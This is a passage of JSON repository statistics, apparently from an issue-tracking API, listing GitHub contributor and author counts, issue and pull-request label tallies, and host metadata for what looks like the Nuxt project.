mihul87":3,"lassediercks":3,"rchl":3,"clarkdo":3,"Jannchie":3,"madebyfabian":3,"brandonlee121":3,"angelhdzmultimedia":3,"mustafa60x":3,"pothuraju-dev":3,"sanjaiyan-dev":3,"noppytinto":3,"frasza":3,"vmrjnvc":3,"NozomuIkuta":3,"buglavecz":3,"edimitchel":3,"AcelisWeaven":3,"phojie":3,"Ray0907":3,"OsamaHaikal":3,"doganalper":3,"darioferderber":3,"underfin":2,"watsonhaw5566":2,"harishsg99":2,"niklaswolf":2,"Maxttier":2,"arifcartaba":2,"ilyaliao":2,"wzc520pyfm":2,"amandesai01":2,"frosato-dev":2,"JJPSeno":2,"abhi12299":2,"DavidFrings":2,"Lilja":2,"bufarda504skelton":2,"ASISBusiness":2,"TimoCuijpers":2,"samupl":2,"halolauxu":2,"caporalCode":2,"lukewarlow":2,"IonianPlayboy":2,"Cheaterman":2,"mohab-sameh":2,"selfire1":2,"Ingramz":2,"SergkeiM":2,"ceddy4395":2,"jeffreyvdhondel":2,"ivansky":2,"riddla":2,"prsevero":2,"EvgenyWas":2,"harunari0928":2,"mak7an":2,"praburangki":2,"acidjazz":2,"naruko-hstk":2,"bootsmann1995":2,"FelipeO16":2,"JonathanSchndr":2,"robm94":2,"th1m0":2,"giveget-ee":2,"s1gr1d":2,"jhony1104":2,"DarkGhostHunter":2,"Koshux":2,"Vahagn-Zaqaryan":2,"krank56":2,"emmron":2,"ThomasWT":2,"MarcelMpunkt":2,"44kia244":2,"gal-cernilogar":2,"claytonchew":2,"awfulness":2,"rinu":2,"dwood-csi":2,"ismailsabet":2,"nopeless":2,"florian-strasser":2,"itchina110":2,"yamanoku":2,"bf":2,"babs20":2,"Kim-Lan":2,"rileychh":2,"step-security-bot":2,"zshimanchik":2,"felixgabler":2,"Kornil":2,"benmccann":2,"devdewa":2,"Eazash":2,"mrleblanc101":2,"huynl-96":2,"KUN1007":2,"toto6038":2,"shao-wang-me":2,"matt-clegg":2,"PrimeTimeTran":2,"kyohei-23":2,"alexbit-codemod":2,"ms-fadaei":2,"miaobuao":2,"hacknug":2,"Ibra-cesar":2,"sammyfilly":2,"GarnierAdam":2,"mummybot":2,"Clarkkkk":2,"awdr74100":2,"felix-dolderer":2,"agenordebriat":2,"Chalks":2,"divine":2,"Twocram":2,"zync09":2,"EfraimGENC":2,"SparK-Cruz":2,"webfansplz":2,"johankrijt":2,"Buzut":2,"AuroraTea":2,"RBV1":2,"mianlang":2,"wowcopy88":2,"dethdkn":2,"dbzx10299":2,"Nimit012":2,"Flosciante":2,"TimGuendel":2,"YanxinTang":2,"ymansurozer":2,"irishkooky":2,"trandaison":2,"hriteek":2,"cram0":2,"dwightjack":2,"stephiescastle":2,"Dobefu":2,"john-psina":2,"gustavwilliam":2,"jilx951102":2,"mehdi-coding":2,"AngeloSchulerPiletti":2,"florian-lefebvre":2,"jpsc":2,"k-karen":2,"AllenYu0118":2,"aaharu":2,"VladStepanov":2,"InvincibleJun":2,"byStrange":2,"OnlyWick":2,"kewinzaq1":2,"toyi":2,"s-en-o":2,"shaunnbarron":2,"hypermug1":2,"navanjr":2,"CharleeWa":2,"Timeraa":2,"zer0fire":2,"DenisLug":2,"yxw007":2,"fenghan34":2,"andresilva-cc":2,"MuhammadM1998":2,"iegik":2,"IvanEh":2,"sofuxro":2,"lgcardeas":2,"oneminch":2,"Martichou":2,"Aleroms":2,"jcppman":2,"babakfp":2,"ShayanTheNerd":2,"aewshyae":2,"cheike569":2,"L422Y":2,"chris-basebone":2,"hecktarzuli":2,"dargmuesli":2,"kongmoumou":2,"guska8":2,"yeskunall":2,"crisarji":2,"adamcikado":2,"drowhannn":2,"warlock1996":2,"farnabaz":2,"MaxKostenko":2,"TroyanOlga":2,"imreegall":2,"shayr1":2,"Gehbt":2,"jl8n":2,"jelmerdemaat":2,"Evobaso-J":2,"nikitadmitr":2,"luxterful":2,"pan93412":2,"sossost":2,"tdekoning":2,"petarvnikolov":2,"BracketJohn":2,"troyciesco":2,"danielphilipjohnson":2,"zunderbolt":2,"rohit-chouhan":2,"rubyisrust":2,"dennisadriaans":2,"sghoshsd":2,"Alexandros23Kazantzidis":2,"i-udas":2,"lansi951":2,"sxzz":2,"jkpeyi":2,"remonke":2,"letstri":2,"oimo23":2,"victorgarciaesgi":2,"Eckhardt-D":2,"paranoidPhantom":2,"skmedix":2,"shahabbasian":2,"lehni":2,"Tamas-hi":2,"Rigo-m":2,"guspan-tanadi":2,"FlantasticDan":2,"paulmelero":2,"drevantonder":2,"mxmxmmgg":2,"Tofandel":2,"ah-dc":2,"nag5000":2,"chenfan0":2,"mmeester":2,"ivan-kalachikov":2,"marccremer":2,"hitochan777":2,"ojvribeiro":2,"Trent-Fellbootman":2,"schirrel":2,"garthreckers":2,"mxschmitt":2,"lijie90":2,"arashsheyda":2,"Nonolanlan1007":2,"jamesdawsonWD":2,"antoinerey":2,"RollingTL":2,"michaelmcandrew":2,"zeelrupapara":2,"justinkekeocha":2,"derHodrig":2,"wJoenn":2,"WonderBerry":2,"xc6pm":2,"siegerts":1,"Revadike":1,"obulat":1,"edwh":1,"hosseinmoghaddam":1,"aussieboi":1,"haradhansharma":1,"toniengelhardt":1,"bounoable":1,"colinhacks":1,"graup":1,"Youhan":1,"jcolpal":1,"FlorianWerndl":1,"ordago":1,"Fanreza":1,"Flamenate":1,"chakAs3":1,"Seboran":1,"riskrole":1,"toooni":1,"dreitzner":1,"scscgit":1,"theguriev":1,"Boby900":1,"adrienZ":1,"genu":1,"baiwusanyu-c":1,"leonceaklin":1,"eternalltruth":1,"tomidealonge":1,"kyumoon":1,"freb97":1,"AlbertBrand":1,"pmnzt":1,"Jamie4224":1,"joli5986zD":1,"DanielRivers":1,"chris-bailey":1,"pgraug":1,"samk-dev":1,"azizramdan":1,"MaxMonteil":1,"Suv4o":1,"TakNePoidet":1,"stafyniaksacha":1,"9romise":1,"khattaksd":1,"maxmaxme":1,"leoosa":1,"joypal23jkp":1,"OrlS15":1,"vargasmesh":1,"GerryWilko":1,"ChrisGV04":1,"ChiaHanTu":1,"ijkml":1,"semibroiled":1,"adeyinkaezra123":1,"bastienrossi":1,"louis70109":1,"jannescb":1,"xxxhussein":1,"KeJunMao":1,"1nusah":1,"marcelobotega":1,"AWBroch":1,"Fiyuva":1,"tada5hi":1,"itsmnthn":1,"IlyaSemenov":1,"paulo-pertierra":1,"igorexa34314":1,"maxkcy":1,"kecrily":1,"maritaria":1,"DanSnow":1,"DamnFilthy":1,"0xflotus":1,"weixinyan":1,"simllll":1,"willwillems":1,"undermoonn":1,"Rich-Harris":1,"AloisSeckar":1,"abhishek213-alb":1,"CaptainFalcon92":1,"johnjenkins":1,"xanzhu":1,"antoinezanardi":1,"devzakir":1,"DaniAcu":1,"OskarLebuda":1,"jaegar-wolf":1,"chris-visser":1,"Holiden":1,"NigmaX":1,"bmulholland":1,"Aurion72":1,"rotem-bar":1,"Gypsophyllite":1,"msmakouz":1,"Ivankalachikov":1,"DavidDeSloovere":1,"kawadah":1,"8ctavio":1,"Yisrae":1,"ablaszkiewicz":1,"dgxo":1,"BenceSzalai":1,"Pitabread8":1,"lucianotonet":1,"quentinmcq":1,"bitbytebit1":1,"ToBinio":1,"larbish":1,"heygsc":1,"QuiiBz":1,"BenjaminOddou":1,"nasrob":1,"vasisouv":1,"HZooly":1,"ay2m":1,"medfreeman":1,"hillaryke":1,"naokihaba":1,"maninak":1,"JabinPeng":1,"DarkVen0m":1,"bipsen":1,"jackylamhk":1,"Sma11X":1,"anubra266":1,"Gecolay":1,"arsengoian":1,"passionate-bram":1,"sheriffderek":1,"yaroslav-mygal":1,"shuvo-me":1,"boc-the-git":1,"ram-skrrrtskrrrt":1,"vachmara":1,"MSchutt":1,"HP8585":1,"iamandrewluca":1,"frs99":1,"icarusgk":1,"chenPengXu":1,"nobkd":1,"Null78":1,"xxhls":1,"marr":1,"oritwoen":1,"mehrazmorshed":1,"wuiyang":1,"nateemerson":1,"TonyFresneau":1,"EvanMaFYH":1,"s0h311":1,"quentint":1,"davidglezz":1,"connerblanton":1,"g1eny0ung":1,"liangyuetian":1,"RodrigoProjects":1,"arkhamvm":1,"Dominic-Marcelino":1,"S1RANN":1,"sharkfin009":1,"adhamfarrag":1,"Aietes":1,"fimion":1,"MichaelJCole":1,"EwenQuim":1,"maoberlehner":1,"ali4zimi":1,"bluwy":1,"LouisHaftmann":1,"stephenjason89":1,"rudolfbyker":1,"pamenary":1,"default-kaas":1,"akintoluvic":1,"emilecaron":1}},"host":{"table":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2025-10-31T00:00:39.152Z","repositories_count":11267478,"issues_count":35012465,"pull_requests_count":113629785,"authors_count":11042209,"icon_url":"https://github.com/github.png","host_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories","owners_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/owners","authors_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors"}},"past_year_issue_labels_count":{"table":{"pending triage":1146,"needs reproduction":182,"possible regression":175,"🔨 p3-minor":79,"nitro":72,"bug":58,"closed-by-bot":54,"good first issue":50,"upstream":42,"documentation":33,"workaround available":29,"🍰 p2-nice-to-have":29,"types":19,"enhancement":18,"discussion":16,"❗ p4-important":14,"dx":13,"upstream-bug":12,"3.x":11,"vite":9,"4.x":8,"layers":7,"server components":7,"pages":7,"performance":6,"windows":4,"chore":4,"✨ good reproduction":4,"🔥 p5-urgent":2,"rolldown-vite":2,"5.x":2,"inline styles":2,"refactor":2,"suspense":2,"webpack":1,"⚠️ breaking change":1,"2.x":1,"cli":1,"bun":1,"🧹 p1-chore":1,"kit":1,"needs details":1,"rspack":1}},"past_year_pull_request_labels_count":{"table":{"3.x":2045,"chore":1143,"bug":466,"documentation":289,"4.x":277,"enhancement":151,"performance":79,"refactor":57,"test":46,"dx":13,"🔨 p3-minor":12,"dependencies":9,"javascript":9,"types":8,"🍰 p2-nice-to-have":6,"vite":5,"❗ p4-important":4,"pages":4,"discussion":3,"nitro":2,"2.x":2,"inline styles":2,"server components":2,"rspack":2,"webpack":2,"schema":2,"upstream":1,"pending triage":1,"possible regression":1,"layers":1,"5.x":1}},"past_year_issue_author_associations_count":{"table":{"NONE":1138,"CONTRIBUTOR":202,"MEMBER":69,"COLLABORATOR":8}},"past_year_pull_request_author_associations_count":{"table":{"CONTRIBUTOR":1724,"MEMBER":812,"NONE":154,"COLLABORATOR":36}},"past_year_issue_authors":{"table":{"danielroe":28,"Maakdev":16,"martinszeltins":15,"cernymatej":14,"Gwynerva":14,"moshetanzer":12,"TheAlexLichter":11,"bbhxwl":11,"mrleblanc101":11,"IlyaSemenov":10,"mickosi":9,"raminjafary":8,"oom-":8,"OrbisK":8,"AABBCC-cloud":7,"maximepvrt":7,"guaijie":6,"mak7an":5,"gxres042":5,"Q16solver":5,"GrantGryczan":5,"fabianwohlfart":5,"renovate[bot]":4,"miku-nl":4,"artem-kostylev":4,"serhii-chernenko":4,"pont1s":4,"AntonKozhukhar":4,"akfakf0509":4,"stephenjason89":4,"guy-confetti":4,"guska8":4,"fabis94":4,"timhn-bm":4,"ElYaiko":4,"kaaax0815":4,"agracia-foticos":4,"dulnan":4,"Curs3W4ll":4,"kingyue737":4,"BobbieGoede":4,"BlueskyFR":4,"Cocoa-C":3,"devmini1203":3,"mschoeffmann":3,"cjpearson":3,"zumm":3,"mkierdev":3,"Mini-ghost":3,"hanneskuettner":3,"MikeBellika":3,"hecktarzuli":3,"HigherOrderLogic":3,"MickL":3,"JBustin":3,"jcppman":3,"josuelrocha":3,"benedictleejh":3,"BenjaminOddou":3,"luckyloo1730":3,"luc122c":3,"binbin0916":3,"leeovery":3,"laventnc":3,"zoushusong":3,"zengkaii":3,"yschroe":3,"wokalek":3,"Aareksio":3,"tsiotska":3,"adamdehaven":3,"teleskop150750":3,"ahoiroman":3,"silverbackdan":3,"sholohov":3,"AloisSeckar":3,"Rednas83":3,"alSergey":3,"OversensitiveCat":3,"prof-schnitzel":3,"Predota":3,"pgraug":3,"cyberz":2,"vciloglu":2,"vacijj":2,"hahagu":2,"UnSpiraTive":2,"harkor":2,"niklaswolf":2,"tratteo":2,"huang-julien":2,"tomsdob":2,"nicky1038":2,"Ingramz":2,"inthegreenwild":2,"ivansky":2,"Ivnosing":2,"Jannick94":2,"JarvisChao":2,"jasonhibbs":2,"Tofandel":2,"tobychidi":2,"jd-solanki":2,"jjsessa":2,"john-psina":2,"TimGonnet":2,"oskarols":2,"davidstackio":2,"Perdolique":2,"dgrayvold":2,"dhwid":2,"yxd1514":2,"dungsil":2,"dvogelg4al":2,"XY-ShadowK":2,"ettersi":2,"eyyubzademireli":2,"xuxchao":2,"xak2000":2,"omar-labana":2,"fishDev94":2,"florian-strasser":2,"gaisinskii":2,"Ga-O":2,"georgesaliba":2,"vsergiu93":2,"vlaaadislav":2,"nosizejosh":2,"vis97c":2,"LuXDAmore":2,"serkodev":2,"sergeykorobeynikov":2,"s-blanar":2,"mak33v":2,"Satont":2,"Saeid-Za":2,"Makkalay":2,"marr":2,"s3xysteak":2,"matt-clegg":2,"rol2005hun":2,"melasculla":2,"memedovcelil5-sketch":2,"mhdSid":2,"MichaelJCole":2,"rocketiscool":2,"RifatMahmudno-1":2,"Miketenklooster":2,"productdevbook":2,"puzzle-it-nu":2,"mklnz":2,"mktcode":2,"modigithub":2,"jsedanoj":2,"jxk-developer":2,"Timbuktu1982":2,"kaka-bo":2,"Kasheftin":2,"keyboard2005":2,"nestle49":2,"konkarin":2,"pratamatama":2,"KUN1007":2,"L33Z22L11":2,"lacoste-sochi":2,"SwartZCoding":2,"larbish":2,"snakysnake":2,"NamesMT":2,"LegendZDY":2,"leoVetterli":2,"ll-huihui":2,"n0099":2,"lorenzofiamingo":2,"Shhu":2,"ShayanTheNerd":2,"lutejka":2,"alexgil1994":2,"ashotmark":2,"CodeCube0":2,"comfuture":2,"claytonchew":2,"AdrianFahrbach":2,"Barbapapazes":2,"borisdamevin":2,"cfab":2,"bjoaquinc":2,"AfolarinOyelekeRumbl":2,"abaza738":2,"8ctavio":2,"acemero-dev":2,"Chengxj1":2,"blowsie":2,"azizramdan":2,"chunten":2,"ChinDer":2,"CorySpeed":2,"alm43":1,"alphajn":1,"rczdgbg":1,"amostergaard":1,"Ragura":1,"pir0zh0k":1,"Revadike":1,"ribbityfrog":1,"richtera":1,"Ricky816845":1,"AllanOricil":1,"robinbeatty":1,"robinscholz":1,"robmontesinos":1,"alkstal":1,"RodrigoProjects":1,"alihardan":1,"romhml":1,"Planitron":1,"pmaiko":1,"Anoesj":1,"pot-code":1,"prakhyatgoel":1,"prashantpalikhe":1,"ankeycheng":1,"angelhdzmultimedia":1,"premiumwatchdevice":1,"PReynaud":1,"andreyshivas":1,"andreww2012":1,"Promiseify":1,"Proxx07":1,"purrrplelipton":1,"putrafajarh":1,"andrescellini":1,"andamansunda":1,"Quasarman":1,"qw050123":1,"R0N1n-dev":1,"Racusthor":1,"sebj54":1,"sebrs3018":1,"segidev":1,"SelfhostedPro":1,"semibroiled":1,"septatrix":1,"sepZeng":1,"alexiokay":1,"Alex-CZL":1,"serkon":1,"sgc-fireball":1,"shanyi-front":1,"shaobeichen":1,"sh-at-cs":1,"alexanderop":1,"shehab267":1,"shellandbull":1,"alebar42":1,"shinynet":1,"shivamp-argus":1,"AlansCodeLog":1,"shopeelike":1,"Siilwyn":1,"aku12138":1,"tungvtdigidinos":1,"roseyda":1,"rraagghhu":1,"RuoFeng2015":1,"Rusinas":1,"RuslanDimitriuk":1,"RuslanPospelov":1,"rvetrsek":1,"rylanharper":1,"s00d":1,"alexzhang1030":1,"AlexVeeBee":1,"safakdinc":1,"sahaAcat":1,"saint-james-fr":1,"sajjadbarcha":1,"sakurawaifu":1,"salamanderin45":1,"samuelreichor":1,"sapphi-red":1,"alexkramer98":1,"alexisgaillard43":1,"sbruegel":1,"schneider-carlo":1,"schplitt":1,"sebaguse":1,"aveliino88":1,"murisceman":1,"murshex":1,"mussingtonr":1,"M-weiwei":1,"artm4r":1,"artfoor123":1,"nandordudas":1,"neilmispelaar":1,"NersisyanT":1,"artemklishch":1,"nhj7":1,"NH-Limon":1,"arshx86":1,"nicolasreszka":1,"niddu85":1,"NikhilVerma":1,"ariesding":1,"nikolayvn":1,"ni-marchuk":1,"njoswald":1,"nogolang":1,"nooooooooooooooon":1,"nopeless":1,"Norbiros":1,"milelazar":1,"MilesWuCode":1,"AutoOrganize":1,"miquelromero":1,"misstarn":1,"Mittcio":1,"mkdirnow":1,"automa-wiki":1,"Attacler":1,"at0mic-l1mbo":1,"mocsimas":1,"asonnleitner":1,"Mokkapps":1,"MontherTwisi":1,"MooseSaeed":1,"moraleja39":1,"MosheL":1,"mrauhu":1,"mrc-bsllt":1,"mrchoke":1,"arunanshub":1,"artokhotnikov":1,"mseeley":1,"m-shum":1,"pablosdos":1,"Pajicc":1,"pamenary":1,"paranoidPhantom":1,"paro-paro":1,"patrickyue":1,"patrikwalker":1,"patzick":1,"paulcrussell":1,"paulius1230":1,"paulvonber":1,"pawelgur":1,"Pentadome":1,"peralta":1,"Anton-Plagemann":1,"peterh-capella":1,"peterhijma":1,"peter-wu578":1,"petitkriket":1,"antoinezanardi":1,"philippedasilva-orizone":1,"phoenix-ru":1,"piffie":1,"piotrjoniec":1,"ar45":1,"NtchPlayer":1,"nurgeldiserikbay":1,"nWacky":1,"oflink":1,"olada":1,"olennardo":1,"oliver139":1,"olivierbourdeau":1,"AQMpolyface":1,"onmax":1,"ooahz":1,"Applelo":1,"oooFreaKooo":1,"or2e":1,"aparajita":1,"orenmizr":1,"OrlS15":1,"anyAdmin":1,"otoshimtoshi":1,"oussamalkd":1,"ovchinnikov-lxs":1,"AntonyZ89":1,"OziOcb":1,"a6iyyu":1,"VladislavYakonyuk":1,"volkanakkus":1,"VovaStelmashchuk":1,"voxspox":1,"vrgenl":1,"vsDizzy":1,"a1mersnow":1,"vuthanhbayit":1,"wanxiaodong404":1,"wattanx":1,"webrsb":1,"welldonexing":1,"wesley974":1,"whitep4nth3r":1,"whoisarjen":1,"who-jonson":1,"willwillems":1,"wodepig":1,"WonderBerry":1,"wslxm":1,"wspromise":1,"wszerad":1,"wudobi":1,"tylik1":1,"uistudio-de":1,"umar13893":1,"uniqualitech":1,"unluckynelson":1,"unrevised6419":1,"ablaszkiewicz":1,"untainsYD":1,"urbanambroz":1,"Us3r-gitHub":1,"userquin":1,"AbdouEsi":1,"vahemikayelyan":1,"varugasu":1,"VDidyk":1,"venkateshgiri":1,"victor-ponamariov":1,"vinayakkulkarni":1,"vinothkbest":1,"VioletFlare":1,"vircoding":1,"aastrum":1,"vitebo":1,"VividLemon":1,"Yugendiran28":1,"yulafezmesi":1,"yuriystasiv":1,"yveeven":1,"Yves852":1,"1bod":1,"z0lo13":1,"Z3rio":1,"Zachiah":1,"Zae":1,"zangetsu02":1,"Zebnastien":1,"11Alone11":1,"zhangxu810":1,"zhiquanchi":1,"zhitenghouxmindltd":1,"zhuyujin001":1,"zkuljisatta":1,"zlinst":1,"0youri":1,"zouyn":1,"zsilbi":1,"ztxone":1,"0633605918":1,"wug-ge":1,"wuiyang":1,"87xie":1,"xavier-ottolini":1,"xbzhang1024":1,"xdkaka":1,"Xenossolitarius":1,"xiaoxiangxiyu":1,"xjccc":1,"XpPort":1,"xushnudbek20":1,"5knnbdwm":1,"3urobeat":1,"yanhe0317":1,"yannhodiesne":1,"yan-yanishevsky":1,"yezus122":1,"yi-boide":1,"Yizack":1,"yoohoolai":1,"yooneskh":1,"Youhan":1,"ys928":1,"1MisterT":1,"silvesterwali":1,"Sourav9063":1,"Soya-xy":1,"SprayDev":1,"ssaneemf":1,"sshiling":1,"ssr765":1,"stefanprobst":1,"ajgomezlopez":1,"stephen-tribefibre":1,"Strift":1,"stufffancy":1,"sultondev":1,"sunzw5236":1,"superjump22":1,"SupplyUSA":1,"suyash-ls":1,"svenit":1,"svk-man":1,"aisteneciunaitevalantic":1,"sweptsquash":1,"syczuan":1,"sylic":1,"TaeSeungRyu":1,"talaxasy":1,"simonmaass":1,"sinansalih":1,"sir-kain":1,"siyecoo":1,"Sjoerd":1,"skoenfaelt":1,"sky1001":1,"skyLicx":1,"slavanossar":1,"slps970093":1,"smallma":1,"Smart-Ace-Designs":1,"Smef":1,"smile-alive":1,"SmootherSpike":1,"snakeshift":1,"Akryum":1,"SoaresMG":1,"solamichealolawale":1,"SolidPXL":1,"soluationsign":1,"SomeoneIsWorking":1,"sooooooooooooooooootheby":1,"sotasan":1,"TimoCuijpers":1,"timotheduflos":1,"TinNanndo":1,"tjswk2008":1,"TKyleB":1,"tnniras":1,"tobiasdcl":1,"tobiaslins":1,"toboruo":1,"adnseek":1,"toddeTV":1,"adeiming":1,"tokiory":1,"tomleo":1,"tommie":1,"ad2LeoZheng":1,"toniengelhardt":1,"Tonysmark":1,"toptal0212":1,"tranthanhbinh2603":1,"acidjazz":1,"triplecasquette":1,"tschni":1,"Tu1231":1,"tallroids":1,"Tamagotchi9":1,"tankosinn":1,"TaQuanMinhLong":1,"tareq-abdelwhap":1,"tefanhhh":1,"ahmed-ramzi":1,"terion-name":1,"ahas":1,"TheColorman":1,"TheDirigible":1,"theflyingape":1,"themathmagician":1,"thespider911":1,"thewebbeckons":1,"they-cloned-me":1,"ThibaudDauce":1,"ThimoDEV":1,"thomashohn":1,"ThornWalli":1,"thunder87":1,"TicheleHayesproton":1,"timbenniks":1,"afayROR512":1,"freb97":1,"guakeliao":1,"guibulator":1,"chika3742":1,"chenx130":1,"gvanto":1,"chenhailiang0309":1,"gyhyfj":1,"gytis-hostinger":1,"h3llr4iser":1,"hachmeister":1,"hacknug":1,"HADB":1,"hafizjavaid":1,"CharleeWa":1,"hamonCordova":1,"chadwickellis":1,"ch930410":1,"harlan-zw":1,"Harm-Nullix":1,"hasan-ozbey":1,"hashimkalam":1,"hasnaindev":1,"Hastatus12":1,"Hebilicious":1,"frederic117":1,"frederik-station":1,"frederik-uni":1,"FuwenChen":1,"gabrielduete":1,"ChronicStone":1,"gaomingzhao666":1,"GayashanGamage":1,"genu":1,"ChristopheCVB":1,"GerryWilko":1,"gewisser":1,"giovannimanzoni":1,"GitRowin":1,"glopezep":1,"gluharry":1,"glynnbird":1,"goat865":1,"Gobler":1,"gokulraj-d":1,"chrisbarry":1,"gregorvoinov":1,"gritworks":1,"grob":1,"igrdi":1,"ijkml":1,"ilyamsts":1,"Celtech":1,"imding":1,"imslepov":1,"ineshbose":1,"ING-AFERNANDEZC":1,"ceferrari":1,"insub":1,"integration-center":1,"cedricwe":1,"intuitiveminds":1,"InvixGG":1,"IqroNegoro":1,"irm4nt45":1,"irsyaadbp":1,"isakgustavsen":1,"isamudev":1,"Ischafak":1,"IsraelOrtuno":1,"Itmarz":1,"itsbreadd":1,"lassediercks":1,"hecateball":1,"cfroe":1,"hendrikheil":1,"heneyin":1,"hermesalvesbr":1,"herniqeu":1,"hillaryke":1,"holloway":1,"hopkins385":1,"Hossara":1,"howbizarre":1,"hoywu":1,"Hrdtr":1,"hrynevychroman":1,"cewald":1,"hubfactory":1,"huseeiin":1,"hymair":1,"hywax":1,"Iaicox":1,"Iamdyy":1,"icedevbug":1,"IfnotFr":1,"igorexa34314":1,"cosbgn":1,"dgxo":1,"DharmarajX24":1,"diameter9836":1,"DidoMarchet":1,"ditthkr":1,"divine":1,"diw-dhagen":1,"dladeira":1,"dl-ias":1,"d-low":1,"DmytroIvantsov":1,"doctor-entropy":1,"dolbex":1,"dominic-schmid":1,"DouglasAR01":1,"dovca":1,"drusellers":1,"Dsaquel":1,"dtogias":1,"cobraprojects":1,"cngJo":1,"clopezpro":1,"dyeske61283":1,"dyingsunlight":1,"cy-aleksandr-kupriianov":1,"cyberalien":1,"CorrM":1,"Cyril30":1,"DamianGlowala":1,"dan-hale":1,"danielkellyio":1,"danielrentz":1,"condorheroblog":1,"danny007in":1,"DanyloIvashev":1,"dargmuesli":1,"darioferderber":1,"datamoeras":1,"davestewart":1,"dbelouslv":1,"ddavisj":1,"denishsharma":1,"dennisadriaans":1,"dervondenbergen":1,"deviate-dv8":1,"devistar":1,"codon19":1,"codeflorist":1,"eZ4hUNt":1,"ckhatton":1,"cioraneanu":1,"falasyam":1,"far310":1,"feixue-tech":1,"felixgabler":1,"felixrydberg":1,"Feng-Fred":1,"fieteboerner":1,"filiphazardous":1,"finn-olekahl":1,"chz":1,"fklein-pub":1,"flapili":1,"flav-code":1,"chuxin-cs":1,"FlorianWerndl":1,"Foddie2":1,"foertel":1,"folamy":1,"frankcou":1,"franklin-tina":1,"frbuceta":1,"dylanmccall":1,"dynst":1,"ealbinu":1,"eastgold15":1,"eclipse313":1,"edimitchel":1,"edisonlsm":1,"edsonfervo16mx":1,"edwardespinozza":1,"eevho":1,"eggorybarnes":1,"ElisePatrikainen":1,"clifordpereira":1,"emavitta":1,"EmilyYond":1,"endquote":1,"enekobyhours":1,"eng-gabrielscardoso":1,"enjidev":1,"Erfanprg":1,"Eriktse":1,"EShebunin":1,"exophunk":1,"claylevering":1,"LuisBrescia":1,"luizotcarvalho":1,"luizzappa":1,"lukasborawski":1,"lukascorr":1,"lukaszflorczak":1,"lukszy":1,"lulcca":1,"luoriwusheng-xia":1,"bezoerb":1,"BeraSenol":1,"luxterful":1,"lviardcretat":1,"lvzhenbo":1,"lysimportant":1,"m0k99":1,"benmccann":1,"machinesily":1,"MaciejJezierskiFiskars":1,"madeofsun":1,"MahmoudAbdalrhmanMohamed":1,"Maiquu":1,"beierzhijin":1,"bbotto-pdga":1,"LdoDoeg222":1,"ldursw":1,"lebuhorskiy":1,"blazmrak":1,"LengYXin":1,"leogenot":1,"Leon2xiaowu":1,"bitbytebit1":1,"lihxhit":1,"linpengteng":1,"linuxmobile":1,"Lionad-Morotar":1,"littleCareless":1,"littlepurple":1,"bissolli":1,"lMatthew8":1,"logotip4ik":1,"BinaryGeometry":1,"LorisBaeriswyl":1,"lr-byte":1,"ltroya-as":1,"binaryartifex":1,"luca-smartpricing":1,"bikathi":1,"maxpatiiuk":1,"maxsjoblomws":1,"MCredbear":1,"McSego1990":1,"mdotme":1,"mehdirayan":1,"meirroth":1,"baixiaoyu2997":1,"melroy89":1,"baijii":1,"Me-Phew":1,"mercs600":1,"metkm":1,"mezoo-adel":1,"mgd216":1,"Mhamadkadiry":1,"b7nan":1,"mhpsy":1,"Azurency":1,"michastubi":1,"azoom-thai-doan-son":1,"Azimaet":1,"avinean":1,"miketests":1,"bayramorhan":1,"mananchawla2005":1,"manik-mmsr":1,"manniL":1,"maoberlehner":1,"marianaibarra":1,"martijnhalekor":1,"martin-agustian":1,"MartinLednarLedo":1,"Martin-Schlodinski":1,"BapRx":1,"Marvellous111":1,"marvhock":1,"MasterCarl":1,"mathix420":1,"banaoa":1,"MatteoGabriele":1,"mattmaribojoc":1,"mattmess1221":1,"maximelebreton":1,"Baiyuetribe":1,"maximersetec":1,"maxiosigma":1,"maxmaxme":1,"ItsuoSano":1,"jeky1950":1,"jelmerdemaat":1,"jensentaipei":1,"JenuelDev":1,"JESUMH":1,"JetVolcano":1,"jeydi243":1,"j-hannah":1,"jianxing-xu":1,"JimJiraffe":1,"jinusean":1,"jinwoo-web":1,"jinyongp":1,"brokuka":1,"jkkk125":1,"jlemonz":1,"joaopedrodcf":1,"Joery-M":1,"JoftheV":1,"johnm1998":1,"BrightX":1,"joshbmarshall":1,"JoshuaKGoldberg":1,"brc-dd":1,"iUnknownWs":1,"ivanmaxlogiudice":1,"ivanpuglia":1,"casualmatt":1,"cassitly":1,"Izag-Larm":1,"jagoncalves14":1,"jakubm95":1,"jamols09":1,"jangdamaxdev":1,"jan-johansson-mr":1,"Casmir293":1,"carsonbird":1,"Carseason":1,"jawnothin":1,"jb-alvarado":1,"jbiddulph":1,"carlosvaldesweb":1,"Buzut":1,"jd1378":1,"BryanHuntNV":1,"Jean-FrancoisTrevien":1,"Jebediah-Hang":1,"Jeffrieh":1,"khako":1,"Khoidev99":1,"kidager":1,"boogie-ben":1,"KirillTregubov":1,"Kolobok12309":1,"Bombastickj":1,"KonradDRAST":1,"Koshux":1,"kr1ke":1,"kslap20":1,"kstraszewski":1,"ktr92":1,"Bobakanoosh":1,"kurashina-design":1,"kurt-grung":1,"kusiu":1,"kyohei-23":1,"kyumoon":1,"bndrmrtn":1,"bnason":1,"laineus":1,"lansi951":1,"blro0319":1,"JPeer264":1,"JPustkuchen":1,"brandonwood98":1,"JsonLYH":1,"JuanAndresAlborada":1,"JuliWolf":1,"JuoJuo":1,"justsl":1,"bozicstefan":1,"K1ender":1,"borisgrigorov":1,"Kai-ros":1,"kane-mason":1,"karchung0930":1,"borghol":1,"kav3":1,"KazariEX":1,"kecoma1":1,"keiches":1,"KelpyCode":1,"kemalcany":1,"ketsebaoteth":1,"kevinkenfack":1,"bootsmann1995":1}},"past_year_pull_request_authors":{"table":{"renovate[bot]":1195,"danielroe":441,"huang-julien":114,"Mini-ghost":91,"iiio2":67,"github-actions[bot]":65,"xjccc":53,"OrbisK":38,"cernymatej":33,"BobbieGoede":32,"DamianGlowala":30,"harlan-zw":21,"moshetanzer":18,"Saeid-Za":17,"TheAlexLichter":16,"KazariEX":15,"userquin":15,"antfu":12,"maximepvrt":12,"atinux":10,"onmax":9,"dependabot[bot]":9,"cjpearson":8,"productdevbook":7,"Gwynerva":7,"wattanx":7,"lazercaveman":6,"murshex":6,"Aareksio":6,"Kamsou":6,"lorenzofiamingo":6,"Anoesj":6,"Baroshem":6,"1411430556":6,"Akryum":5,"HugoRCD":5,"HigherOrderL